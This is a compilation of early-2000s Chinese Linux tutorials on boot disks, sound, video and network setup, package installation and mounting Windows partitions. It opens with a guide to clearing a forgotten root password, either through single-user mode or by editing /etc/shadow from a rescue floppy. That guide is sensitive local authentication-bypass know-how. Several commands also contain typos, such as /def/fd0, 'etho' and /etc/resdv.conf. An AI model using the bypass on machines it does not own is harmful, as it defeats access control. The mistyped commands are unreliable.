    如果你的Linux系统是其它版本，不能识别Linux mount=/dev/xxxx，也可使用以下通用方法解决：目前各个版本的Linux都随盘发行有应急引导盘，一般有两张，一张是boot盘，另一张是root盘，关于这两张盘的命名，各个版本基本都差不多，前面几个字符是rescxxxx，后缀是img或gz。我所见到的是：rescboot.img、rescroot.img。找到这两张盘后，使用随盘发行的IMG文件写盘命令rawrite.exe将rescboot.img、rescroot.img两个文件分别写入两张软盘，而后用这两张软盘将Linux引导起来。引导起来后，在超级用户下执行：mount/dev/xxxx/mnt（xxxx的解释同上述）
    ＃cd/mnt
    vi/mnt/etc/passwd
    将超级用户密码删除，删除方法同上。如果你的系统同时拥有passwd和shadow两个文件，仅修改shadow一个文件即可解决问题。


忘记Linux密码怎么办

《一键清理系统垃圾》

忘记Linux密码怎么办

----如果忘记了Linux密码，这时有两种情况，一种是用LILO管理器来启动的，另一种是不通过LILO启动的。如果你的系统是通过LILO管理器来启动的，可在LILO启动提示符LILO boot：后输入Linux single，而后回车启动Linux系统进入单用户模式，这时，就可以用passwd命令来修改你的密码了，修改完后重新启动系统，就可以使用新的密码了。以上方法在中文Turbo Linux 3．0．2下通过，但在Slackware Linux下不能通过。如果是第二种情况，修改密码就麻烦一些。Linux的技术资料介绍和目前有关媒体发表的文章，都说在这种情况下必须从新安装Linux系统。经过笔者的反复摸索，发现用以下方法可以清除Linux的密码：用Linux boot软盘启动，当出现LILO boot：提示符时，输入linux mount=／dev／xxxx，其中xxxx为Linux所在的分区，IDE硬盘的设备名为hda，第一分区为hda1，如果你的系统有两个IDE硬盘，第二个为hdb；如果你使用的是SCSI硬盘，则硬盘的设备名为sda。正确输入硬盘的设备及分区号后启动Linux，系统自动将Linux的分区mount到／mnt下，这时，只要进入到／mnt／etc下，用vi命令将passwd文件中root行中的密码去掉，重新引导系统后，在超级用户下执行passwd命令，重新生成一个密码即可。具体修改位置如下：
root：SDFTYUIIOO34G ：0：0root：／root：／bin／bash

----将带下划线部分的内容删掉后存盘，即可使系统没有密码。如果你的系统拥有passwd和shadow两个文件，需要修改的密码文件则是／etc下的shadow，它是passwd的一个映象，是真正存放密码的文件。

----如果你的Linux系统是其它版本，不能识别linux mount=／dev／xxxx，也可使用以下通用方法解决：目前各个版本的Linux都随盘发行有应急引导盘，一般有两张，一张是boot盘，另一张是root盘，这两张盘的命名，各个版本基本都差不多，前面几个字符是rescxxxx，后缀是img或gz。我所见到的是：rescboot．img、rescroot．img。找到这两张盘后，使用随盘发行的IMG文件写盘命令rawrite．exe将rescboot．img、rescroot．img两个文件分别写入两张软盘，而后用这两张软盘将Linux引导起来。引导起来后，在超级用户下执行：mount／dev／xxxx／mnt（xxxx的解释同上述）

＃cd／mnt

vi／mnt／etc／passwd

----将超级用户密码删除，删除方法同上。如果你的系统同时拥有passwd和shadow两个文件，仅修改shadow一个文件即可解决问题。以下是shadow密码文件root行的实际情况：root：Aan3DFTUYOEMF3 ：9804：0：：：：：

----用vi修改时，只须将带下划线部分删除掉即可删除密码。

返回


用好Linux的启动盘

《一键清理系统垃圾》

用好Linux的启动盘

    一、为什么需要Linux启动盘
    有很多理由来说明这个问题：首先它可用于启动Linux系统。其次，当系统发生错误，需要进行系统恢复时我们需要用到它。还有，如果你喜欢经常更新系统内核的话，那么一张启动盘则是必不可少的。
    希望了解Linux系统组成及启动过程的朋友，如果按照本文提供的方法做下去，相信你做完启动盘之后，你对Linux又会有新的认识。
    二、启动盘的类型
    启动盘一般可分为如下两种：一种是只含内核（kernel）的启动盘，这种盘只含有系统内核，并不包括根文件系统（root file system），它在其内核中指明了根文件系统所在的位置，在启动过程中根据该参数去安装根文件系统。也就是说，这种类型的启动盘必须和硬盘上的根文件系统配合才能使用。我们平常意义上的启动盘一般指的就是这种类型，有些资料上也把这种盘称之为boot盘。
    另外还有一种类型的启动盘除了包含内核以外，还包含了文件系统。这种类型的启动盘从某种意义上来说已经是一个完整的操作系统。由于有自己的根文件系统，这种类型的启动盘可以在没有硬盘的机器上启动一个小的Linux系统。这种类型的盘有时也称作boot/root盘。
    三、启动盘的制作
    1.boot盘的制作
    很多Linux发行套件已经提供了boot盘，一般情况是在DOS下使用RAWRITE制作一张boot盘。当然这种方法是在安装Linux之前进行制作。如果在安装了Linux之后希望再制作系统盘，请按以下步骤进行：
    （1）以root的身份进行登录。
    （2）确定内核的位置，一般情况下内核位于/vmlinuz中，当然不同的发行套件中该位置可能会有区别，可以查看相关的文档。
    （3）用rdev命令设置根设备为Linux系统的根文件系统。首先查看内核中对根文件系统的配置，执行如下命令
    ＃rdev /vmlinuz
    如果你的Linux根文件系统位于/dev/hda1，那么应该有如下的信息：
    Root Device /dev/hda1
    注意：该信息随你在安装时的配置不同而结果可能不同。另外还有一点值得注意的是，该设置值可能并不正确，例如我的系统（RedHat 6.0 kernel 2.2.5－15）上的配置值就显示如下：
    ＃rdev /boot/vmlinuz
    Root Device /dev/sdc1 （显示为sdc1即第三SCSI硬盘，而我的机器上根本没有！）
    但是这并不表明该配置有问题，因为lilo.conf中的相关配置项会覆盖该值，详见boot/root盘中的分析。
    （4）如果上一步的显示信息和你的实际配置有偏差，可以执行如下命令进行修正：
    rdev /dev/vmlinuz /dev/hda1 （假设根文件系统位于/dev/hda1上）
    再次执行rdev /vmliuz确保正确，否则做出来的盘是不会启动的！
    （5）拿一张已格式化的软盘（Linux下用fdformat格式化），执行下述命令：
    ＃dd if=/vmlinuz of=/def/fd0 bs=8192
    至此，一张专用于引导Linux系统的boot盘就做好了。去测试一下吧！
    2．boot/root盘的制作
    boot/root盘由两部分组成，即核心和根文件系统。要把这两部分都放到一个1.44MB的软盘上去，通常要对内核和根文件系统进行压缩，压缩核心的最好方法是进行重新编译内核，将一些不必要的支持去掉，如对网络和其它周边设备的支持，重要的一点是记住内核必须支持RAMDISK及ext2，否则系统不能正常引导。关于内核的编译本文不再阐述，下面重点介绍如何生成根文件系统的压缩包。对于根文件系统的压缩包括两方面的问题，第一是只保留必要的根文件系统组件，第二是将根文件系统做成一个压缩包，类似于内核工作的原理。
    （1）根文件系统概述
    一个根文件系统必须包括支持完整Linux系统的全部东西，它至少应包括以下几项：
    ·基本文件系统结构
    ·至少含有以下目录：/dev、 /proc、 /bin、 /etc、 /lib、 /usr、 /tmp
    ·最基本的应用程序，如sh、 ls、 cp、 mv等
    ·最低限度的配置文件，如rc、 inittab、 fstab等
    ·设备：/dev/hd＊、 /dev/tty＊、 /dev/fd0
    ·基本程序运行所需的库函数
    以上所需文件一般情况下会超过1.44M，因此我们通常的做法是先准备好内容后再压缩到软盘中，当用软盘启动时，再把文件解压到内存中，形成一个虚拟盘（RAMDISK），通过RAMDISK控制系统启动。
    为了能创建以上的根文件系统，你必须有一个空闲的能够放下大约4MB文件的RAMDISK。系统缺省情况下已替我们建好了一个大小为4096KB的RAMDISK，其设备名一般为/dev/ram0，我们就使用它来保存我们预先准备好的根文件系统。
    （2）创建根文件系统
    Linux内核识别两种可以直接拷贝到RAMDISK的文件系统，它们是minix 和ext2，ext2性能更好。mke2fs缺省情况下在1.44M的软盘上产生360个信息节点，使用压缩格式的根文件系统需要更多的信息节点，所以使用如下命令创建文件系统可以创建2000个信息节点，而且一般不会用完。
    mke2fs －m 0 －i 2000 /dev/ram0
    mke2fs将会自动判断设备容量的大小并相应地配置自身，－m 0参数防止它给root保留空间，这样会腾出更多的有用空间。接着把虚拟盘挂在节点/mnt上：
    mount －t ext2 /dev/ram0 /mnt/floppy
    接着是创建目录。根文件系统最少应该有如下8个目录：
    /dev — 设备
    /proc — proc 文件系统所需目录
    /etc — 系统配置文件
    /sbin — 重要的系统程序
    /bin — 基本应用程序
    /lib — 共享函数库
    /mnt — 装载其他磁盘节点
    /usr — 附加应用程序
    执行如下命令创建这些目录：
    ＃cd /mnt/floppy
    ＃mkdir dev proc etc sbin bin lib mnt usr
    接下来的工作就是确定各个目录下的内容了：
    ·/dev：/dev中含有系统不可缺少的设备文件。可以把现有系统中/dev的文件拷贝过来，然后删除不必要的文件。命令cp －dpR /dev /mnt会拷贝/dev整个目录但不拷贝文件内容，dp开关保证链接文件仍然不变，不会拷贝链接所指原文件，而且属性不变。如果你没有SCSI设备，删除所有的以sd开头的文件。如果你不想使用串口设备，删除所有以cua开头的文件。不过记住一定要保留console、kmem、mem、null、ram、tty1等文件。
    ·/etc：这个目录中含有一些必不可少的系统配置文件。这下面的文件比较多，那么到底哪些文件是必需的，哪些可有可无呢？由于这下面的文件一般是一些文本文件，都不是很大，干脆全部保留算了。
    我的启动盘中含有不到15个配置文件，大致可分为3部分：
    ·rc.d/＊ — 系统启动脚本
    ·fstab — 列出要登录的文件系统
    ·inittab — 包含启动过程参数
    而且这些文件都是最简单的。rc应该包括：
    ＃!/bin/sh
    /bin/mount －av
    /bin/hostname yjy
    fstab应包括：
    /dev/ram0 / ext2 defaults
    /dev/fd0 / ext2 defaults
    /proc /proc proc defaults
    inittab包括：
    id:2:initdefault:
    si::sysinit:/etc/rc
    1:2345:respawn:/sbin/getty 9600 tty1
    2:23:respawn:/sbin/getty 9600 tty2
    ·/bin和/sbin：该目录中包含有必不可少的应用程序，如ls， mv， cat，你可以根据自己的需要选择，不过一定要记住包括以下程序：init， getty，login， mount，运行你的rc的外壳shell。
    ·/lib: 该目录中包含有你的启动盘启动过程中所需要的共享函数库，如果缺少必须的函数库，系统会停止启动或出现一大堆错误信息，所以一定要注意。
    几乎所有的程序都需要libc库，列一下目录/lib中的libc：
    ％ ls －l /lib/libc＊
    －rwxr－xr－x 1 root root 4016683 Apr 16 18:48 libc－2.1.1.so＊
    lrwxrwxrwx 1 root root 13 Apr 10 12:25 libc.so.6 －> libc－2.1.1.so＊
    libc.so.6的6表示版本号，它指向的文件才是你真正需要的。
    查看每一个程序使用的函数库，用命令ldd，如：
    ％ ldd /sbin/mke2fs
    libext2fs.so.2 => /lib/libext2fs.so.2 （0x40014000）
    libcom_err.so.2 => /lib/libcom_err.so.2 （0x40026000）
    libuuid.so.1 => /lib/libuuid.so.1 （0x40028000）
    libc.so.6 => /lib/libc.so.6 （0x4002c000）
    /lib/ld－linux.so.2 => /lib/ld－linux.so.2 （0x40000000）
    输出右边的库都是必须的，有的可能是链接文件。
    在/lib目录下你还必须有函数库装载器，这个装载器或是ld.so （对 a.out 库） 或是 ld－linux.so （对 ELF 库）。新版本的ldd一般会告诉你所需库的装载器。
    把装载器和库拷贝到/lib后，再仔细检查一遍，一定保证没有遗漏。
    （3）模块
    如果你有一个模块化的内核，你还得考虑需要加载的模块，它们都位于/lib/modules，你可以把不是很重要的模块放到别的盘上，当系统启动后再加载，这样会节省启动盘的空间。
    （4） 打包
    一旦你完成了上述工作，卸下虚拟盘，拷贝到一个文件中，然后压缩。
    umount /mnt
    dd if=/dev/ram0 bs=1k | gzip －v9>rfs.gz
    压缩结束后，你就拥有了一个压缩的根文件系统，不过你得检查它的大小，如果大了，你还得删除一些东西。
    3．组织引导盘
    有了根文件系统和内核之后，最后的工作就是把它们组织在一起。
    先检查总文件的大小，如果超出1.44MB，就得考虑重新创建所需或用两张磁盘，即使用两张磁盘，你的根文件系统也得小于1.44MB。
    接着就是确定是用LILO控制启动还是直接用拷贝到盘上的内核控制启动。用LILO的好处是你能增加支持初始化硬件的参数到内核中，缺点是较复杂且占用珍贵的磁盘空间，不过我还是建议使用LILO控制系统启动。下面我就介绍用LILO的过程，直接用拷贝到盘上的内核控制启动的方法就不作叙述了。
    用LILO控制启动首先就得写一个LILO配置文件，以下是一个最简单的配置文件，但是已经够用了。
    boot =/dev/fd0
    install =/boot/boot.b
    map =/boot/map
    read－write
    backup =/dev/null
    compact
    image = KERNEL
    label = Bootdisk
    root =/dev/fd0
    参数说明见相关资料。然后把它命名为bdlilo.conf。　接下来就是创建一个内核文件系统。把一张干净的软盘插入软驱，在上面创建ext2文件系统。
    mke2fs －i 8192 －m 0 /dev/fd0 50
    “－i 8192”表示每8192位创建一个信息节点。接着登录系统：
    mount /dev/fd0 /mnt/floppy
    rm －rf /mnt/floppy/lost＋found
    mkdir /mnt/floppy{boot，dev}
    删去目录/ lost＋found，创建两个目录/boot和/dev，再执行：
    cp －R /dev/{null，fd0} /mnt/floppy/dev
    接着拷贝启动加载器boot.b到目录/boot中，
    cp /boot/boot.b /mnt/floppy/boot
    最后，拷贝你创建的配置文件bdlilo.conf和内核到内核文件系统的根目录下，
    cp bdlilo.conf KERNEL /mnt/floppy
    现在，根文件系统所需的所有文件都准备就绪了。再执行下面的命令可以帮助安装LILO引导器到软盘的根文件系统上面：
    lilo －v －C bdlilo.conf －r /mnt
    OK，可以运行它了，如果运行结果没有错误就表明成功，否则就应该仔细检查一下上面的设置。


在Linux下安装声卡

《一键清理系统垃圾》

在Linux下安装声卡

    就Linux系统对硬件设备的支持特性而言，对声卡的支持是很糟糕的。不过现在好了，有两种驱动程序可以弥补Linux系统的不足。一种是OSS（开放声音系统），一种是ALSA（先进Linux声音架构）。OSS是一个商业声卡驱动程序，需要花钱购买，否则每次启动后，你只可以免费使用240分钟；ALSA是自由软件，可以免费使用。
    一、安装OSS声卡驱动程序
    1．从http://www.opensound.com/下载OSS驱动程序
    2．启动Linux，把下载下来的osslinux393q－2217－UP.tar.gz拷到一个临时目录中，如：
    cp osslinux393q－2217－UP.tar.gz /tmp/
    cd /tmp
    tar zxvf osslinux392v－glibc－2212－UP.tar.gz
    此时文件已经解开，你可以看到在当前目录下有四个文件：INSTALL、LICENSE、oss－install和oss.pkg文件，其中INSTALL是安装帮助文件，如果你是第一次安装一定要好好看一看。
    3．配置
    以root用户身份运行oss－install：
    ./oss－install
    如果出现了“No such file or directory”的错误信息，那是因为你下载的OSS驱动程序的版本和你用的Linux不匹配，可以重新到上述站点，下载相应的驱动程序就可以了。
    这时候一般会提示：你的Linux以模块的形式加载了声卡驱动程序，要不要安装程序自动将它去掉?选择去掉就可以了。
    接下来就是处理过程、协议及一大堆东西，接受协议安装，使用默认安装路径即可（/usr/lib/oss）。oss一般可以自动检测出大部分声卡，你可以看看结果是不是和你的声卡相符，如果相符，直接在菜单中选择“Save changes and Exit..”即可。对于那些不能直接探测到的声卡，你就只有用手工方法选择了。如对Yamaha OPL3－SAX （YMF715/YMF719） chip 可以选择：“Generic Yamaha OPL3－SAx （YMF715/YMF719） non－PnP”driver。
    4．打开/关闭声卡
    在默认的安装目录/usr/local/bin里有一个soundon命令，它可以用来打开oss驱动，同样的你也可以用soundoff命令关闭oss驱动。
    5．疑难解决
    有时也可能出现这样的情况，你的声卡检测到了，而且安装过程也好像一切正常，但是声卡就是不能正常工作。不要急，OSS还有可以让你手工调节设置参数的地方，其实，在“Save changes and Exit”的同一个窗口中，还有一个选项“Manual Configuration”，它就是让你手工调整设置参数的，你可以在这里设置声卡的IO、DMA等参数。
    二、安装ALSA声卡驱动程序
    1．到http://www.heihei.com/下载下面四个软件包：
    alsa－driver－0.5.9.tar.bz2
    alsaconf－0.4.3b.tar.gz
    alsa－lib－0.5.9.tar.bz2
    alsa－utils－0.5.9.tar.bz2
    2．先安装alsa－driver－0.5.9.tar.bz2这个文件：
    （1）cp alsa－driver－0.5.9.tar.bz2 /tmp
    将alsa－driver－0.5.9.tar.bz2 拷到/tmp目录下。
    （2）bunzip2 alsa－driver－0.5.9.tar.bz2
    解压缩这个文件，会在/tmp目录下生成一个文件叫做alsa－driver－0.5.9.tar。
    （3）tar xvf alsa－driver－0.5.9.tar
    将会在/tmp目录下产生一个子目录叫做alsa－driver－0.5.9，alsa的所有文件就存放在这个目录下。
    （4）cd alsa－driver－0.5.9
    进入alsa的驱动程序所存放的目录，准备配置和编译它。这时你可以看一下目录下的INSTALL文件来了解安装的步骤和注意事项。
    （5）依次运行下面三个命令：
    ./configure
    make install
    ./snddevices
    3．编辑/etc/ modules.conf文件
    这个文件的配置虽然比较麻烦，但用alsaconf－0.4.3b.tar.gz也可以配好它，运行命令：
    （1）cp alsaconf－0.4.3b.tar.gz /tmp
    将alsaconf－0.4.3b.tar.gz 拷到/tmp目录下。
    （2）tar zxvf alsaconf－0.4.3b.tar.gz
    解压缩这个文件，会在/tmp目录下生成一个子目录叫做alsaconf－0.4.3b。
    （3）./alsaconf
    会出现一个窗口叫你选择声卡，像SoundBlaster及ESS1868、S3_SonicVibes_PCI、Ensoniq_AudioPCI_ES1370 1371等，很多目前的kernel还不支持的声卡它都可以支持了。
    选好声卡之后系统会问你一些问题，都回答OK，然后会回到第一个画面问你要不要继续设第二张声卡，选“No_more_cards”退出即可。完成这个步骤之后，/etc/modules.conf这个文件就基本上自动配置好了，重新启动电脑后声卡就可以发声了。
    4．如果还不行，那么你就还需要安装alsa－lib和alsa－utils，安装方法和alsa－driver一样，注意要先安装alsa－lib，再安装alsa－utils。将文件拷到/tmp目录，解压缩，然后运行命令make和make install，具体请参照上面alsa－driver的安装步骤。
    安装后到alsa－utils（解开alsa－utils－0.5.9.tar.bz2会产生该目录）目录下的alsamixer子目录执行
    ./alsamixer
    好了，你的声卡应该能发声了。


在Linux下安装显卡驱动程序

《一键清理系统垃圾》

在Linux下安装显卡驱动程序

    相信大多数人在安装Linux时遇到的第一个难题，就是Linux不认你的显卡。而显卡安装不正确或胡乱选一个驱动程序安上则难以进入X Window。即使勉强进去了，因为分辨率太低，桌面上的文字和图片都放大了好几倍，仍无法使用。我的Linux是Red Hat，显卡是Trident Blade 3D，属于Linux不认识之列。于我是四处找资料，经过一段时间的摸索，终于成功地安装了显卡驱动。现在我就把经验写出来，好让大家都能顺利进入X Window，领略Linux的风采。
    一、下载驱动程序
    首先要找到显卡for Linux的驱动程序。现在绝大多数的3D显卡都已有了for Linux的驱动程序，可到各显卡厂商的主页或Linux的相关站点上去寻找。我找到的驱动程序名为XF86_SVGA，文件格式是tar.gz，是Linux的压缩文件。需要说明的是，我的XFree86服务器下的显示模块有XF86_MONO、XF86_VGA16、XF86_SVGA等类型，在安装显卡时，服务器根据显卡的情况来加载不同的显示模块，如果显示模块加载不正确，显卡就不能正常显示。XF86_SVGA能支持256色或更高位的色彩，我们的3D显卡就靠它了。
    二、文件解压
    由于下载的是压缩文件，就需要进行解压缩，可以在Linux下用tar命令解压，也可在Windows下用Winzip将文件解压到硬盘的任意目录下（我将文件解压到C:\win98\TEMP目录下），不熟悉Linux命令的人最好在Windows下解压，可以省去许多麻烦。
    三、装载磁盘驱动器
    Linux需要装载磁盘驱动器才能读取文件，装载的方法详见《电脑报》2000年35期19版的《在Linux中共享Windows系统资源（上）》一文。启动Linux后，在字符界面下输入“mount　－t　vfat　 /dev/hda1　/mnt/winc”命令，将C盘装载到Linux下。需要注意的是，如果大家在上一步选择的是在Linux下解压，就得先进行装载磁盘驱动器这一步，再进行文件的解压缩，步骤刚好颠倒过来。
    四、拷贝文件
    将XF86_SVGA文件拷贝到/usr/X11R6/bin目录下。注意，这是针对Red Hat版本来说，其它版本的路径不一定相同。我用的命令是“cp　/mnt/winc/win98/TEMP/XF86_SVGA　 /usr/X11R6/bin”（大家可根据自己的情况灵活掌握，关键是路径一定要正确，还要分清字母的大小写）。如果系统提示有同名文件，问是否覆盖，一定要选择“y”。这些旧文件可能是以前安装显卡时加载的，对我们没有实际用处。这里再告诉大家一个小窍门，在输入文件名的时候，输完XF86后按一下Tab键，再接着输SVGA，下划线_就可以出来了，按键盘上的下划线键是没用的，切记。
    五、配置显卡
    文件拷贝完成后，输入Xconfigurator，启动显卡配置程序。我在显卡列表中仍然没有找到Trident Blade 3D，于是选最后一个选项“Unlist”，然后选择加载的显示模块为SVGA，再选择显示器型号、显存大小、刷新频率，选定16位色、800×600的分辨率。一切就绪，X服务器开始检测，十几秒钟后，检测完毕，X服务器再没有像以往那样给出出错信息。我迫不及待键入startx，不一会儿，X Window蓝色的桌面终于呈现在我的面前。
    总结：在Linux下安装显卡驱动程序，首先要下载显卡支持Linux的驱动程序，再将其拷贝到/usr/X11R6/bin目录下，然后启动显卡配置程序进行配置即可。
    除了上述的方法外，还有一种更直接的办法，就是升级XFree86的版本，可到其主页http://www.xfree86.org下载最新的版本4.0.1，稳定版是3.3.2。新版本可支持更多的硬件设备，不过，你要首先到主页上查看相关说明，确定新版本是否支持你的显卡。


在Linux下配置网卡

《一键清理系统垃圾》

在Linux下配置网卡

    Linux的真正魅力在于它的网络功能，因而也只有在Internet下才能体验到它的魅力。Linux从诞生开始一直是以网络作为其发展动力的。Linux是一个开放的系统，因而大部分的网卡都得到支持。在Linux下配置网卡一般有两种方法。下面我就分别介绍：
    一、用Linuxconf配置网络
    首先用root身份登录Linux系统，在Gnome环境中，单击脚印按钮，指向“system”，选择“control－panel”子项，然后单击System Configuration图标，也可以在xterm下用＃linuxconf启动Linuxconf。
    1．打开“Networking/Client tasks/Basic host Information”分支，选择Host name标签，输入主机名字（可以不填）；选择Adaptor 1标签，选中“enable”选项，表示能够使用第一个网卡；选择配置方式为Manual；然后分别填写：
    Primary name ＋ domain（主机名.域名），如：webmail.xjtu.edu.cn;
    IP address（主机的IP地址），如：202.117.11.47;
    Net mask（子网掩码），如：255.255.255.0;
    Net device（网络设备名）如：eth0，（Linux下以太网网卡名为eth，第一块为eth0，第二块为eth1，依次类推）；
    Kernel module（内核模块），如果是NE2000的网卡，那么应输入ne； I/O port（I/O端口地址），如0x300；
    IRQ（中断号），如10。I/O端口地址和IRQ中断号可以从Windows中查得，注意IRQ不得与其它设备冲突。
    2．打开“Networking/Client tasks/Name Server Specification（DNS）”分支，弹出“Resolve configuration”对话框，选中“DNS is required for normal operation”后填写：
    Default domain（缺省域名），如：xjtu.edu.cn;
    Nameserver1（第一个DNS服务器的IP地址），我的为202.117.0.20；nameserver 2 （opt）（可选的第二个DNS服务器的IP地址），如：202.117.0.21。
    3．打开“Config/Networking/Routing and gateways”选项，弹出Defaults对话框，在Defaultgateway中填写网关IP地址，如：202.117.11.1;选中“enable routing”选项。
    最后接受以上填写值，激活并退出。
    二、基于命令行方式的手工配置方法
    手工方法是在以太网卡已装入的情况下编辑配置文件来配置网络的方法。具体步骤如下：
    1．编辑/etc/rc.d/rc.local文件
    在该文件中加入类似下列各行（＃号以后为注释，下同）:
    ＃配置第一个以太网卡eth0的IP地址，子网掩码，UP起激活作用
    /sbin/ifconfig，etho 202.117.11.47 netmask 255.255.255.0 UP
    ＃配置并激活回环设备lo
    /sbin/ifconfig lo 127.0.0.1 UP
    /sbin/route add host 127.0.0.1 lo
    ＃让Linux将本地网的信息发送到eth0接口
    /sbin/route add net 202.117.11.47 netmask 255.255.255.0 eth0
    ＃指定访问远程网络的缺省网关
    /sbin/route default gw 202.117.11.1 eth0
    2．编辑/etc/resdv.conf
    该文件作用是设置域名服务器。加入下面内容
    ＃指定本机域名
    Domain xjtu.edu.cn
    ＃域名称服务器（DNS）
    Nameserver 202.117.0.20
    Nameserver 202.117.0.21
    3．编辑/etc/hosts.conf文件
    设置主机文件表。可加入如下行：
    order hosts，bind
    multi on
    202.117.11.47 webmail.xjtu.edu.cn webmail
    第一行表示：查找名称时，首先检查本地hosts文件，然后按/etc/resolv.conf所指定的Nameservers顺序查找。重新启动就可以了。


在Linux中安装应用软件

《一键清理系统垃圾》

在Linux中安装应用软件

    Linux这一新兴操作系统，由于系统核心源代码完全公开的缘故，存在着许多基于GPL协议之下的分发版本。在一片反行业垄断的呼声中，这只小企鹅近年来的发展速度实在令人振奋。
    其中较为国人熟知的RedHat Linux中，就已经集成了网络、多媒体、游戏等多方面的相关软件。尽管系统本身提供了甚为丰富的应用软件，很多时候，我们还是需要自己动手安装软件。因此，掌握一些在Linux系统上安装应用软件的基本知识，就显得非常重要了。
    从网站或者是光盘上找到的Linux软件包，常见的格式包括有rpm、tar、gz、tgz、bz、bz2等等。
    一、RPM文件的安装
    RPM是RedHat Package Manager（RedHat软件包管理工具）的缩写，这一文件格式名称虽然打上了RedHat的标志，但是其原始设计理念是开放式的，现在包括OpenLinux、S.u.S.E.以及Turbo Linux等Linux的分发版本都有采用，可以算是公认的行业标准了。
    RPM文件在Linux系统中的安装最为简便。以著名的图像处理软件XV为例，其RPM包xv－3.10a－13.i386.rpm可以在该程序的主页http://www.trilon.com/xv中下载取得。
    在Terminal中，基本的安装指令如下：
    rpm －i xv－3.10a－13.i386.rpm
    如果你的连网速度足够快，也可以直接从网络上安装应用软件，只需要在软件的文件名前加上适当的URL路径：
    rpm －i ftp://ftp.trilon.com/pub/xv/xv－3.10a－13.i386.rpm
    作为一个软件包管理工具，RPM管理着系统已安装的所有RPM程序组件的资料。我们也可以使用RPM来卸载相关的应用程序。
    rpm －e xv
    RPM的常用参数还包括：
    －vh：显示安装进度；
    －U：升级软件包；
    －qpl：列出RPM软件包内的文件信息；
    －qpi：列出RPM软件包的描述信息；
    －qf：查找指定文件属于哪个RPM软件包；
    －Va：校验所有的RPM软件包，查找丢失的文件；
    更为详尽的参数及其用法可以查看RPM的帮助文档。
    在X－Window中，RPM文件的图形化安装及管理方式对用户来说，显得更为友好。仍以XV软件为例，在Linux的文件管理器中找到xv－3.10a－13.i386.rpm文件之后，用鼠标右击它，在弹出菜单中就可以找到专为RPM软件包准备的三个指令：Show Info、Upgrade、Install。
    选择“Show Info”之后，我们将可以看到如^37020202a^所示的软件包信息窗口。窗口分为三个部分，顶端显示的是软件名、大小、创建及安装日期以及开发者网站等相关信息；在中间的方框内，是关于软件的概述；而下面显示的则是软件包内包含的所有文件及其路径信息，它会告诉你软件包内的各个文件将被安装到系统的哪些目录中，留意这些信息的好处是，你可以很容易地找到启动程序的路径。
    此时点击底部的“Install”或者“Upgrade”按钮之后，将开始进行软件的安装或者升级，此时还会弹出一个提示安装进度的窗口。
    RPM软件包较之于其他类型的软件包，有着许多优势，但是并不是说RPM软件的安装都是一帆风顺的。常见的错误包括试图安装一个已经安装好了的软件、所要安装的软件需要其他软件或者系统库文件的支持（此时应该先行安装这些相关软件或者系统库文件）等，情形都和Windows类似。
    二、tar、tar.gz、tar.Z、tgz、bz2软件包的安装
    除了rpm文件之外，我们还会经常遇到以tar、tar.gz等格式发布的Linux软件。这几类软件包的实质都是将一堆文件进行打包之后，再经过压缩处理（tar文件未经压缩）而成（压缩类型的丰富程度类似于Windows下的ZIP、RAR、ARJ等）。因此，要安装这几类格式的软件包时，都需要经过相应的解压缩及解包的步骤。上述各类格式的软件包的解压缩及解包指令举例简述如下：
    1.解nianqing.tar：tar xf nianqing.tar
    2.解nianqing.tar.gz：tar zxf nianqing.tar.gz
    3.解nianqing.tar.Z：tar zxf nianqing.tar.Z
    4.解nianqing.tgz：tar zxf backup.tgz
    5.解nianqing.bz2：bunzip2 nianqing.bz2
    解包后得到的一堆文件，通常都会存放在一个目录里面。视软件作者的不同，有些会是已经编译好的程序，更多的则是需要自己再行编译的源代码。进入相应目录后，使用“ls －F －color”指令，可执行程序将会以带“＊”标记的亮绿色显示，对于已编译好的程序，直接键入带路径的指令行或者在X Window中双击该程序文件即可运行程序。
    而自行编译源代码，也不是一件太难的事情。在进行编译工作以前，应该先用vi等文书编辑器阅读一下软件目录中的Readme、Install等重要的相关文档，在这里你会找到软件详尽的编译步骤及注意事项。通常的编译步骤会是这样：
    ./configure
    make
    make install（需要取得root身份才能执行此指令）
    编译完成之后，在当前目录或者是名为src的子目录下，可以很容易地发现软件的可执行程序。至此，软件的安装便告一段落。接下来，我们就可以领略一下Linux丰富的软件世界了。


在Linux中共享Windows系统资源

《一键清理系统垃圾》

在Linux中共享Windows系统资源

    在一部电脑上装有Linux和Windows的用户，可能需要在Linux中用到包括软盘、光盘以及Windows分区中的文件，如当你在Windows操作系统中上网，却下载了Linux的应用软件的时候。下面我就向大家详细介绍这方面的知识和具体的应用。
    一、装载（mount）
    （一）准备知识
    在Linux系统中想要使用软驱的话，要先把它们装载到系统中，装载指令mount的格式如下：
    mount －t 文件系统类型 设备文件名 装载目录
    1．文件系统类型
    文件系统类型一般来说就是分区格式，依操作系统的不同而不同。下面将Linux系统支持的文件系统类型择要分列如^35020202a^表一：
    2．设备文件名
    在Linux系统中，各个驱动器设备的命名和Windows中的规则（如A：、C：等）有很大的区别。所有的系统硬件设备都可以在/dev目录下找到对应的设备文件名。例如/dev/mouse就用来表示系统中的鼠标。磁盘驱动器的各个不同分区所对应的设备文件名列表如^35020202b^表二：
    假设第一个IDE硬盘驱动器被分成数个分区，通常，第一个分区可以肯定其设备文件名为/dev/hda1，但其它分区的设备文件名就不是可以依次类推得到的（特别是当用户使用了诸如PTM之类的磁盘分区工具的时候）。如果你想要知道硬盘各分区所对应的设备文件名，可以在控制台下执行cfdisk的指令，则各分区对应的设备文件名就可以一目了然了。
    3．装载目录
    通常我们都会在/mnt目录下面为需要装载的磁盘驱动器创建一个目录，不过这并不意味着它们不可以被装载于其它未被使用的目录中。再者，所谓装载目录，并不是将被装载的磁盘驱动器整个复制到本地，而仅仅是在本地提供一个装载点用以联系其它需要装载的磁盘驱动器。
    Linux系统对字符的大小写是敏感的，但是在Windows中就不是这样。而当你装载一个Windows系统中的驱动器后，对其上的文件操作时，字符的大小写就变得不敏感了，这意味着用户不可以在装载的Windows驱动器的同一目录中建立这么两个文件：ABC.TXT和abc.txt，因为在Windows系统中，它们代表同一个文件。
    （二）装载实例
    1．装载软盘
    首先在/mnt目录下为软磁盘创建一个目录floppy（有时Linux系统在安装的时候已经为你做了这一步）：
    mkdir /mnt/floppy
    接着用装载指令将软盘中的内容装载到这一目录中：
    mount －t msdos /dev/fd0 /mnt/floppy
    此后你就可以在/mnt/floppy下完全访问到软磁盘中的内容了。当然你亦可以用vfat这一文件系统类型代替msdos以使你能正确访问到软盘上的长文件名字，或者是用ext2代替它以使你可以访问到Linux文件格式的软盘。
    2．装载FAT 32格式的C盘
